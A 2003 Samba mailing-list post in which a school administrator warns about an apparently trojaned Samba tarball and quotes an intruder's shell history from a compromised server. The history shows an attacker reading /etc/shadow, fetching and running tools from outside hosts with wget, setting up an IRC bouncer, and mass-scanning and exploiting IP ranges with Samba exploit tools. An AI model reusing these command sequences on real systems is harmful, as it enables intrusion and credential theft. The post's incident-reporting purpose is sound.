[Samba] Faked samba packages / rootkit?
Markus Schabel
markus.schabel at tgm.ac.at
Sat Dec 27 20:27:49 GMT 2003
Does anybody know of these samba packages?
http://ftp.cvut.cz/samba/samba-latest.tar.gz
AFAICS they are faked and contain some kind of rootkit (you can see
this in the history below. the server this history is from is taken
offline for security reasons, and nobody is there till 7th Jan I
can't give you more details)
> 144 w
> 145 cat /etc/issue
> 146 uname -a
> 147 cat /etc/shadow
> 148 cd /usr/lib
> 149 wget http://ftp.cvut.cz/samba/samba-latest.tar.gz
> 150 5tar zxvf samba-latest.tar.gz
> 151 tar zxvf samba-latest.tar.gz
> 152 rm -rf samba-latest.tar.gz
> 153 cd samba-3.0.0/
> 154 cd source/
> 155 ./configure
> 156 ./make
> 157 ls
> 158 make
> 159 w
> 160 ls
> 161 cd ..
> 162 cd ..
> 163 cd ..
> 164 cd ..
> 165 ls
> 166 cat /etc/shadows
> 167 cat /etc/shadow
> 168 cat /etc/hosts
> 169 cat /proc/cpuinfo
> 170 socklsit
> 171 sockslist
> 172 w
> 173 killall -9 in.identd
> 174 killall -9 smbd
> 175 killall -9 nmbd
> 176 smbd -D
> 177 nmbd -D
> 178 5 locate in.identd
> 179 locate in.identd
> 180 cd /var/tmp
> 181 ls
> 182 cd .nlp
> 183 wget geocities.com/st3lly/cmd.tg
> 184 wget http://geocities.com/st3lly/cmd.tg
> 185 wget http://geocities.com/st3lly/cmd.tgz
> 186 tar zxvf cmd.tgz
> 187 cd cmd
> 188 ls
> 189 ./stealth 0 193.95.215.54 6666 6668
> 190 ./stealth 193.95.215.54 6666 6668
> 191 ./stealth 193.95.215.54 6667
> 192 w
> 193 cd /var/tmp
> 194 cd .nlp
> 195 wget http://members.xoom.it/pippo46/selena.tgz
> 196 wget http://62.211.66.12/pippo46/selena.tgz
> 197 tar zxvf selena.tgz
> 198 rm selena
> 199 rm selena.tgz
> 200 cd selena/
> 201 ls
> 202 ./assl 212.213
> 203 uname -a
> 204 cd var/tmp/.nlp
> 205 ls
> 206 cd .nlp
> 207 cd /var/tmp
> 208 cd .nlp
> 209 ls
> 210 cd /tmp/
> 211 cd rk
> 212 ls
> 213 wget http://members.xoom.it/vendett/psymag.tar.gz
> 214 wget http://62.211.66.12/vendett/psymag.tar.gz
> 215 tar zxvf psymag.tar.gz
> 216 rm psymag.tar.gz
> 217 cd psybnc
> 218 wget http://62.211.66.12/vendett/psybnc.conf
> 219 ./psybnc
> 220 cd ..
> 221 rm -fr psybnc
> 222 wget http://62.211.66.12/pippo46/asmb.tar
> 223 tar zyvf asmb.tar
> 224 tar zxvf asmb.tar
> 225 rm asmb.tar
> 226 cd w00t/
> 227 ./asmb 120
> 228 ./asmb 110
> 229 ./asmb 217
> 230 ./asmb 217.229
> 231 cat woot.log
> 232 ./samba -b 0 -v 217.229.113.107
> 233 ./asmb 217.46
> 234 ./asmb 217.228
> 235 cd /tmp/rk
> 236 cd w00t/
> 237 ./asmb 194.142
> 238 ./samba -b 0 -v 194.142.156.50
> 239 ./asmb 195.165
> 240 ./asmb 195.240
> 241 ./asmb 195.80
> 242 cat woot.log
> 243 ./samba -b 0 -v 217.229.113.107
> 244 ./samba -b 0 -v 217.229.203.3
> 245 ./samba -b 0 -v 217.229.230.36
> 246 cd /tmp
> 247 ls
> 248 cd rk
> 249 cd w00t/
> 250 cat woot.log
> 251 ./samba -b 0 -v 81.182.126.85
> 252 ./samba -b 0 -v 81.182.126.85
> 253 cat woot.log
> 254 ./samba -b 0 -v 81.182.40.114
> 255 ./samba -b 0 -v 81.209
> 256 ./asmb 81.209
> 257 ./asmb 81.42
> 258 ./asmb 81.248
> 259 w
> 260 cd /var/tmp/.nlp
> 261 ls
> 262 cd ..
> 263 cd rk
> 264 cd /tmp/rk/.nlp
> 265 cd /tmp/
> 266 cd rk
> 267 cd .nlp
> 268 cd w00t/
> 269 ./asmb 195.97
> 270 ./asmb 195.166
> 271 ./asmb 81.183
> 272 cat woot.log
> 273 ./samba -b 0 -v 81.183.0.29
> 274 ./asmb 81.182
> 275 cat woot.log
> 276 ./samba -b 0 -v 81.182.40.114
> 277 ./samba -b 0 -v 81.182.40.114
> 278 ./samba -b 0 -v 81.182.40.114
> 279 ./samba -b 0 -v 81.182.90.152
> 280 cat woot.log
> 281 ./samba -b 0 -v 81.183.0.29
> 282 cat /proc/cpuinfo
> 283 cat /etc/hosts
> 284 w
> 285 cat /etc/issue
> 286 fuser -v 113/tcp
> 287 cat /etc/inetd.conf |grep -i ident
> 288 5vi /etc/inetd.conf
> 289 vi /etc/inetd.conf
> 290 vi /etc/inetd.conf
> 291 5killall -HUP inetd
> 292 killall -HUP inetd
> 293 cd /var/tmp
> 294 ls
> 295 cd /tmp
> 296 ls
> 297 cd rk
> 298 ls
> 299 cd ..
> 300 cd rk
> 301 wget http://members.xoom.it/vendett/psymag.tar.gz
> 302 wget http://62.211.66.12/vendett/psymag.tar.gz
> 303 tar zxvf psymag.tar.gz
> 304 ls
> 305 tar zxf psymag.tar.gz
> 306 tar zxvf psymag.tar.gz
> 307 tar xvfz psymag.tar.gz
> 308 rm psymag.tar.gz
> 309 ls
> 310 cd /usr/lib/.nlp
> 311 cd var/tmp
> 312 cd /var/tmp
> 313 ls
> 314 cd .nlp
> 315 ls
> 316 wget http://members.xoom.it/vendett/psymag.tar.gz
> 317 wget http://62.211.66.12/vendett/psymag.tar.gz
> 318 tar xvfz psymag.tar.gz
> 319 tar -xvfz psymag.tar.gz
> 320 rm psymag.tar.gz
> 321 w
> 322 wget http://62.211.66.12/pippo46/psy.tar.gz
> 323 tar zxvf psy.tar.gz
> 324 rm psy.tar.gz
> 325 wget http://62.211.66.12/pippo46/psyBNC2.3.1.tar
> 326 tar xf psyBNC2.3.1.tar
> 327 ls
> 328 cd psybnc.
> 329 cd psybnc
> 330 ls
> 331 wget http://62.211.66.12/pippo46/psybnc.conf
> 332 ./psybnc
> 333 ls
> 334 menuconf
> 335 ./menuconf
> 336 ./make
> 337 cd menuconf
> 338 ld
> 339 ld
> 340 ls
> 341 cd ..
> 342 ls
> 343 make
> 344 ls
> 345 ./psybnc
> 346 vi psybnc.conf
> 347 ./psybnc
> 348 vi psybnc.conf
> 349 ./psybnc
> 350 vi psybnc.conf
> 351 ./psybnc
> 352 cd ..
> 353 adduser
> 354 cd /tmo/rk/w00t
> 355 cd /tmp/rk/w00t
> 356 ./samba -b 0 -v 193.170.8.129
> 357 cd /tmp/rk/w00t
> 358 ./samba -b 0 -v 211.21.64.204
> 359 ./samba -b 0 -v 211.21.64.204
> 360 ./samba -b 0 -v 128.210.147.242
> 361 cd /tmp/rk/w00t
> 362 ./asmb 128.210
> 363 ./asmb 128.211
> 364 ./asmb 128.209
> 365 ./asmb 128
> 366 ./asmb 210.86
> 367 ./asmb 128
> 368 ./asmb 219
> 369 ./asmb 219.111
> 370 ./asmb 219.166
> 371 cat woot.log
> 372 ./samba -b 0 -v 219.166.79.186
> 373 ./samba -b 0 -v 219.166.81.34
> 374 ./asmb 219.80
> 375 cat woot.log
> 376 ./asmb 219.91
> 377 ./samba -b 0 -v 219.91.104.72
> 378 ./asmb 211.23
> 379 ./asmb 212.54
> 380 ./asmb 212.163
> 381 ./asmb 212.191
> 382 cd ..
> 383 wget xplo.150m.com/allsun.tgz
> 384 tar zxvf allsun.tgz
> 385 tar xf allsun.tgz
> 386 gunzip allsun.tgz
> 387 cd w00t/
> 388 ./asmb 10.12
> 389 ./asmb 212.37
> 390 ./asmb 215
> 391 ./asmb 189
> 392 ./asmb 140
> 393 ./asmb 82.129
> 394 ./asmb 82.39
> 395 cd /tmp/rk
> 396 cd w00t/
> 397 ./samba -b 0 -v 213.81.174.155
> 398 cat woot.log
> 399 cd ..
> 400 ls
> 401 cd w00t/
> 402 ./asmb 213.81
> 403 cd /var/tmp/.nlp
> 404 cd selena/
> 405 ls
> 406 ./ssx
> 407 cd /tmp
> 408 cd rk
> 409 cd w00t/
> 410 ./asmb 210
> 411 ./asmb 210.146
> 412 ./asmb 210.192
> 413 ls
> 414 ./samba -b 0 -v 128.210.147.242
> 415 ./samba -b 0 -v 128.210.147.241
> 416 ./samba -b 0 -v 128.210.147.243
> 417 ./samba -b 0 -v 128.210.147.241
> 418 ./samba -b 0 -v 128.210.147.242
> 419 ./samba -b 0 -v 128.210.147.242
> 420 ./asmb 210.233
> 421 ./samba -b 0 -v 210.233.23.147
> 422 ./asmb 210.59
> 423 ./asmb 211
> 424 ./asmb 211.130
> 425 cat woot.lo
> 426 ./asmb 211.21
> 427 cat woot.log
> 428 ./samba -b 0 -v 211.21.64.204
> 429 ./asmb 211.22
> 430 ./asmb 212
> 431 ./asmb 212.37
> 432 ./asmb 212.101
> 433 ./asmb 212.185
> 434 ./asmb 212.36
> 435 ./asmb 212.80
> 436 ./asmb 214
> 437 ./asmb 158
> 438 ./asmb 02
> 439 ./asmb 82
> 440 ./asmb 82.161
> 441 ./asmb 82.255
> 442 cd /tmp/rk/w00t
> 443 ls
> 444 ./asmb 83
> 445 ./asmb 193.40
> 446 ./asmb 212.28
> 447 ./asmb 172
> 448 ./asmb 172.163
> 449 ./asmb 62.218
> 450 ./asmb 61.189
> 451 ./asmb 63
> 452 ./asmb 62.233
> 453 ./asmb 62.146
> 454 ./asmb 62.140
> 455 ./asmb 62
> 456 ./asmb 62.174
> 457 ./asmb 62.32
> 458 ./asmb 62.57
> 459 ./asmb 62.90
> 460 ./asmb 207.44
> 461 ./asmb 213.64
> 462 ./asmb 213.52
> 463 ./asmb 213.60
> 464 cat woot.log
> 465 ./samba -b 0 -v 213.60.109.1
> 466 ./samba -b 0 -v 213.60.109.1
> 467 wget http://members.xoom.it/pippo46/php.tar
> 468 tar xf php.tar
> 469 ls
> 470 cd php.tar
> 471 cd ..
> 472 cd php.tar
> 473 wget http://members.xoom.it/pippo46/php.tar
> 474 tar xf php.tar
> 475 ls
> 476 wget http://62.211.66.12/pippo46/php.tar
> 477 ./Start 62.162
> 478 ls
> 479 tar xf php.tar
> 480 tar zxvf php.tar
> 481 5http://www.zorgii.0catch.com/phpxpl.tar.gz
> 482 wget http://www.zorgii.0catch.com/phpxpl.tar.gz
> 483 tar zxvf phpxpl.tar.gz
> 484 5gunzip phpxpl.tar.gz
> 485 gunzip phpxpl.tar.gz
> 486 cd w00t/
> 487 ./asmb 213.61
> 488 ./samba -b 0 -v 213.60.109.1
> 489 ./asmb 213.62
> 490 ./asmb 213.58
> 491 ./asmb 213.57
> 492 ./asmb 213.70
> 493 ./asmb 213.80
> 494 ./samba -b 0 -v 81.183.0.29
> 495 w
> 496 cd /var/tmp
> 497 cd /tmp/rk
> 498 cd w00t/
> 499 ./samba -b 0 -v 211.22.94.147
> 500 ./samba -b 0 -v 194.95.226.21
--
\\\ ||| /// _\=/_
( @ @ ) (o o)
+--------oOOo-(_)-oOOo--------------------------oOOo-(_)-oOOo------+
| Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at |
| IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at |
| markus.schabel at tgm.ac.at Tel.: +43(1)33126/316 |
| markus.schabel at members.fsf.org Fax.: +43(1)33126/154 |
| FSF Associate Member #597, Linux User #259595 (counter.li.org) |
| oOOo Yet Another Spam Trap: oOOo |
| ( ) oOOo yast at tgm.ac.at ( ) oOOo |
+--------\ (----( )--------------------------\ ( -----( )-----+
\_) ) / \_) ) /
(_/ (_/
Computers are like airconditioners:
They stop working properly if you open windows.
More information about the samba
mailing list